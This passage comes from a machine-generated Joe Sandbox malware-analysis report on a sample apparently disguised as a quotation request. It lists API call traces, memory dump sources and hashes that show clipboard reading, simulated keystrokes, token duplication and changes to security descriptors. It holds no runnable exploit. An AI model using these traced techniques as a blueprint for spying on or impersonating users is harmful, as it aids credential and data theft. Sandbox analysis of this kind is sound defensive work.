• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• GetFileAttributesW.KERNELBASE(?), ref: 015FD5F3
Memory Dump Source
• Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00F11CBC
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: InfoParametersSystem
• String ID:
• API String ID: 3098949447-0
APIs
  • Part of subcall function 00F15745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F1949C,?,00008000), ref: 00F15773
• GetLastError.KERNEL32(00000002,00000000), ref: 00F876DE
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CreateErrorFileLast
• String ID:
• API String ID: 1214770103-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 015FF009
Memory Dump Source
• Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• CloseHandle.KERNELBASE(?,?,00000000,00F524E0), ref: 00F16266
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 015FF009
Memory Dump Source
• Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: 376e640bf60d01f0c8bc48bc08eb984dc1ac6236aae90da2aabdfc90a66b08fc
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: 99E0E67594010DDFDB00DFB4D54969D7BF4FF04301F100165FD01D2281D6309D508A72
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00FA961A
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FA965B
                                                                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00FA969F
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FA96C9
                                                                                                                    • SendMessageW.USER32 ref: 00FA96F2
                                                                                                                    • GetKeyState.USER32(00000011), ref: 00FA978B
                                                                                                                    • GetKeyState.USER32(00000009), ref: 00FA9798
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FA97AE
                                                                                                                    • GetKeyState.USER32(00000010), ref: 00FA97B8
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FA97E9
                                                                                                                    • SendMessageW.USER32 ref: 00FA9810
                                                                                                                    • SendMessageW.USER32(?,00001030,?,00FA7E95), ref: 00FA9918
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00FA992E
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00FA9941
                                                                                                                    • SetCapture.USER32(?), ref: 00FA994A
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00FA99AF
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00FA99BC
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FA99D6
                                                                                                                    • ReleaseCapture.USER32 ref: 00FA99E1
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA9A19
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FA9A26
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FA9A80
                                                                                                                    • SendMessageW.USER32 ref: 00FA9AAE
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FA9AEB
                                                                                                                    • SendMessageW.USER32 ref: 00FA9B1A
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00FA9B3B
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00FA9B4A
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA9B68
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FA9B75
                                                                                                                    • GetParent.USER32(?), ref: 00FA9B93
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FA9BFA
                                                                                                                    • SendMessageW.USER32 ref: 00FA9C2B
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00FA9C84
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FA9CB4
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FA9CDE
                                                                                                                    • SendMessageW.USER32 ref: 00FA9D01
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00FA9D4E
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00FA9D82
                                                                                                                      • Part of subcall function 00F29944: GetWindowLongW.USER32(?,000000EB), ref: 00F29952
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA9E05
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                    • API String ID: 3429851547-4164748364
                                                                                                                    • Opcode ID: 64c14a22b02890a90f9eda3c6bddd94b4606619fef7336861c50f179640e84c8
                                                                                                                    • Instruction ID: 728eb95646aea594809633cc1beb90c9910b4bffcde379f9155ba346778ea291
                                                                                                                    • Opcode Fuzzy Hash: 64c14a22b02890a90f9eda3c6bddd94b4606619fef7336861c50f179640e84c8
                                                                                                                    • Instruction Fuzzy Hash: 774281B5608245AFD724CF24CC84EAABBE5FF4A320F140629F559873A1D7B1D850EF91
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00FA48F3
                                                                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00FA4908
                                                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00FA4927
                                                                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00FA494B
                                                                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00FA495C
                                                                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00FA497B
                                                                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00FA49AE
                                                                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00FA49D4
                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00FA4A0F
                                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FA4A56
                                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FA4A7E
                                                                                                                    • IsMenu.USER32(?), ref: 00FA4A97
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FA4AF2
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FA4B20
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA4B94
                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00FA4BE3
                                                                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00FA4C82
                                                                                                                    • wsprintfW.USER32 ref: 00FA4CAE
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FA4CC9
                                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00FA4CF1
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FA4D13
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FA4D33
                                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00FA4D5A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                    • API String ID: 4054740463-328681919
                                                                                                                    • Opcode ID: a8f7cf9ee33659b8bcf2c59b09e6e657a3b26593005ac6cce26e97c929036178
                                                                                                                    • Instruction ID: 9d9ceae37b031dd4e3e69396b36afcaff8907f052c650001a0d8903c18d155dd
                                                                                                                    • Opcode Fuzzy Hash: a8f7cf9ee33659b8bcf2c59b09e6e657a3b26593005ac6cce26e97c929036178
                                                                                                                    • Instruction Fuzzy Hash: BC1218B5900218AFEB258F24DC45FAE7BF8EF86710F144129F519DB2D1DBB4A940EB90
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F2F998
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F6F474
                                                                                                                    • IsIconic.USER32(00000000), ref: 00F6F47D
                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 00F6F48A
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F6F494
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F6F4AA
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F6F4B1
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F6F4BD
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F6F4CE
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F6F4D6
                                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F6F4DE
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F6F4E1
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6F4F6
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F6F501
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6F50B
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F6F510
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6F519
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F6F51E
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6F528
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F6F52D
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F6F530
                                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F6F557
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                    • Opcode ID: ec4a01e8dffcbee3d6185506bf3e8b03efd4958f747f80b6fe0cf22cf33fa310
                                                                                                                    • Instruction ID: d99df8363ab17de285da8ccffb4ab3be5ec426d33cd73ffe3c78a91abbcf5def
                                                                                                                    • Opcode Fuzzy Hash: ec4a01e8dffcbee3d6185506bf3e8b03efd4958f747f80b6fe0cf22cf33fa310
                                                                                                                    • Instruction Fuzzy Hash: 25311EB1E4021CBEEB216BB59C4AFBF7E6CEB45B50F140065FA05E61D1CAB15D00BAA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7170D
                                                                                                                      • Part of subcall function 00F716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F7173A
                                                                                                                      • Part of subcall function 00F716C3: GetLastError.KERNEL32 ref: 00F7174A
                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F71286
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F712A8
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F712B9
                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F712D1
                                                                                                                    • GetProcessWindowStation.USER32 ref: 00F712EA
                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00F712F4
                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F71310
                                                                                                                      • Part of subcall function 00F710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F711FC), ref: 00F710D4
                                                                                                                      • Part of subcall function 00F710BF: CloseHandle.KERNEL32(?,?,00F711FC), ref: 00F710E9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                    • String ID: $default$winsta0
                                                                                                                    • API String ID: 22674027-1027155976
                                                                                                                    • Opcode ID: dd0967ec8bc0c482f7fb406924d137e8a6a6aa983c5243110a48693141dd32ae
                                                                                                                    • Instruction ID: 07a09b7c65a491e0f38da1691db03434d28a384dc50afdb6c3ea0a9fffd4bcc7
                                                                                                                    • Opcode Fuzzy Hash: dd0967ec8bc0c482f7fb406924d137e8a6a6aa983c5243110a48693141dd32ae
                                                                                                                    • Instruction Fuzzy Hash: 218191B1900208AFDF21DFA8DC49FEE7BB9FF05710F14811AF918A6150D7349958EB62
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71114
                                                                                                                      • Part of subcall function 00F710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71120
                                                                                                                      • Part of subcall function 00F710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F7112F
                                                                                                                      • Part of subcall function 00F710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71136
                                                                                                                      • Part of subcall function 00F710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F7114D
                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F70BCC
                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F70C00
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00F70C17
                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F70C51
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F70C6D
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00F70C84
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F70C8C
                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F70C93
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F70CB4
                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00F70CBB
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F70CEA
                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F70D0C
                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F70D1E
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70D45
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70D4C
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70D55
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70D5C
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70D65
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70D6C
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F70D78
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70D7F
                                                                                                                      • Part of subcall function 00F71193: GetProcessHeap.KERNEL32(00000008,00F70BB1,?,00000000,?,00F70BB1,?), ref: 00F711A1
                                                                                                                      • Part of subcall function 00F71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F70BB1,?), ref: 00F711A8
                                                                                                                      • Part of subcall function 00F71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F70BB1,?), ref: 00F711B7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4175595110-0
                                                                                                                    • Opcode ID: 40eb7cef07638a9b3def7fc56dd54b7cdd7e17914a06f3a38ed74fa8c003e417
                                                                                                                    • Instruction ID: 130ccdb0e2a52c69de79f305828456633327640232cb3df39ee19c46204f1b18
                                                                                                                    • Opcode Fuzzy Hash: 40eb7cef07638a9b3def7fc56dd54b7cdd7e17914a06f3a38ed74fa8c003e417
                                                                                                                    • Instruction Fuzzy Hash: 06715DB1D0020AEBDF10DFA5DC44FAEBBB8BF05310F048516F919E6291DB75A905EBA1
                                                                                                                    APIs
                                                                                                                    • OpenClipboard.USER32(00FACC08), ref: 00F8EB29
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F8EB37
                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00F8EB43
                                                                                                                    • CloseClipboard.USER32 ref: 00F8EB4F
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00F8EB87
                                                                                                                    • CloseClipboard.USER32 ref: 00F8EB91
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F8EBBC
                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00F8EBC9
                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00F8EBD1
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00F8EBE2
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F8EC22
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F8EC38
                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00F8EC44
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00F8EC55
                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F8EC77
                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F8EC94
                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F8ECD2
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F8ECF3
                                                                                                                    • CountClipboardFormats.USER32 ref: 00F8ED14
                                                                                                                    • CloseClipboard.USER32 ref: 00F8ED59
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420908878-0
                                                                                                                    • Opcode ID: 6f53a7b8cd238fbbf62951eda067b05a7b165b82eed5b076f59a486c45f9c835
                                                                                                                    • Instruction ID: 52889095c4e241d65106e6b3c1d5d70a5e1722d531f2b2fb6fa9d196f74cf8a0
                                                                                                                    • Opcode Fuzzy Hash: 6f53a7b8cd238fbbf62951eda067b05a7b165b82eed5b076f59a486c45f9c835
                                                                                                                    • Instruction Fuzzy Hash: 8861E2752043059FD300EF20CC94FAAB7E4AF85724F14451DF856972A2DB31ED49EBA2
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F869BE
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F86A12
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F86A4E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F86A75
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F86AB2
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F86ADF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
